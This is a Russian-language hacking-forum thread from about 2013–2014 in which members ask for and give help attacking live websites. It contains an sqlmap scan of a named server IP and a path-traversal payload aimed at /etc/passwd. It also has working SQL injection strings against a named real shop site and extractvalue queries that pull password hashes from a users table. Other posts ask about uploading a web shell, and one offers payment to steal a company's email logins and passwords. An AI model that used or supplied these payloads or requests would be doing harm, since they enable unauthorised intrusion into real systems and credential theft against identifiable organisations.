Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Massay

    Massay New Member

    Joined:
    6 Mar 2013
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    Так что, мне никто не поможет
     
  2. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Фильтруется table_name . Что сделать можно?

     
    _________________________
  3. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    подзапросы используй

    chapters,flags,lands,menu,menu_out,roots,screens,sites,stat,val,words
     
    1 person likes this.
  4. verda

    verda New Member

    Joined:
    10 Mar 2013
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Просканировал с помощью sqlmap один игровой сервер
    sqlmap --url="http://95.163.86.72/cgi-bin/webstrk.exe/strike?t=1" --data="position=0&tmpid=01234567890234567890"

    в логе написало:
    ......
    [16:45:33] [INFO] POST parameter 'position' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
    [16:45:44] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'Microsoft Access'
    .....
    [16:51:10] [WARNING] POST parameter 'position' is not injectable
    [16:51:10] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')
    .....
    Тестировал несколько раз.
    Просмотрев лог запросов увидел что срабатывало на

    position=-6458' OR (3053=8541)
    position=0%22%29%20AND%206045%3D4434%20AND%20%28%22sLat%22%3D%22sLat
    position=0%20AND%205338%3D7364

    Вручную перебирал - ничего толкового не выходило (ошибки так таковой нету).
    Вопрос - Есть ли вообще инъекция и какая база данных? (Microsoft Access :confused: или нет?)
     
  5. Always

    Always New Member

    Joined:
    8 Feb 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    +UnIon+selECt+group_concat(user,0x3a,file_priv),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+mysql.user
    не выводит: Y, N
    В чем ошибка? Как узнать права?!
     
  6. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Если даже нет прав на mysql.user, то и File_priv подавно не будет.
     
    1 person likes this.
  7. Always

    Always New Member

    Joined:
    8 Feb 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    есть!
     
  8. x.Com

    x.Com New Member

    Joined:
    3 Sep 2010
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    бандиты подскажите плз
    короче не могу залить шелл, пас и логин от админки есть, но админку найти не могу (
    короче беда, подскажите че придумать можно?
     
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    ищи админку
     
    _________________________
  10. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    как крутить подобное ?


    Code:
    Failed to load: index/page_../../../../../../../../../etc/passwd.txt
     
  11. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    /etc/passwd%00 или /etc/passwd[////4096////]
     
  12. x.Com

    x.Com New Member

    Joined:
    3 Sep 2010
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    дык найти не могу, второй день сижу уже, все перепробывал
     
  13. Xvir

    Xvir New Member

    Joined:
    8 Feb 2011
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Ребята помогите раскрутить mssql не как не доходит!
    http://www.ekb.spk.ru/spkekb/shop/prod_detail/_t_/prod=krug_nerzhaveyuschii
     
  14. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    http://www.ekb.spk.ru/spkekb/shop/order.asp/_t_/prod=krug_nerzhaveyuschii'+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('PrValues','SAP_Param5'))--
     
    _________________________
    #22914 kingbeef, 8 Jan 2014
    Last edited: 8 Jan 2014
    2 people like this.
  15. Xvir

    Xvir New Member

    Joined:
    8 Feb 2011
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Друзья у кого нибудь есть желание за возногрождение поработать на этим сайтом tehkomplekt-ural.ru а именно мне нужно все логины и пассы почты их если что пишите в личку
     
  16. Massay

    Massay New Member

    Joined:
    6 Mar 2013
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    Привет всем!)
    Помогите пожалуйста докрутить инъекцию, есть она у меня такого вида "
    "
    Нужный мне хеш она выводит, но не полностью, а только до 32 символов. Как можно обойти это ограничение, и есть ли какое-то готовое решение?
     
  17. Massay

    Massay New Member

    Joined:
    6 Mar 2013
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    Да. но скрипт Hash Id эго тип хеша определить не может.
     
  18. wacky

    wacky Member

    Joined:
    30 Jan 2012
    Messages:
    42
    Likes Received:
    7
    Reputations:
    6
    and extractvalue(rand(),concat(0x3a,(select mid(pass,1,31) from server.users limit 1,1))))--

    and extractvalue(rand(),concat(0x3a,(select mid(pass,32,31) from server.users limit 1,1))))--

    У него еще символ на конкатенацию ушел
     
    #22918 wacky, 9 Jan 2014
    Last edited: 9 Jan 2014
    1 person likes this.
  19. Massay

    Massay New Member

    Joined:
    6 Mar 2013
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    Спасибо большое!!!
     
  20. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    Как использовать эту уязвимость ? http://vagosec.org/2013/12/wordpress-rce-exploit/
     
Thread Status:
Not open for further replies.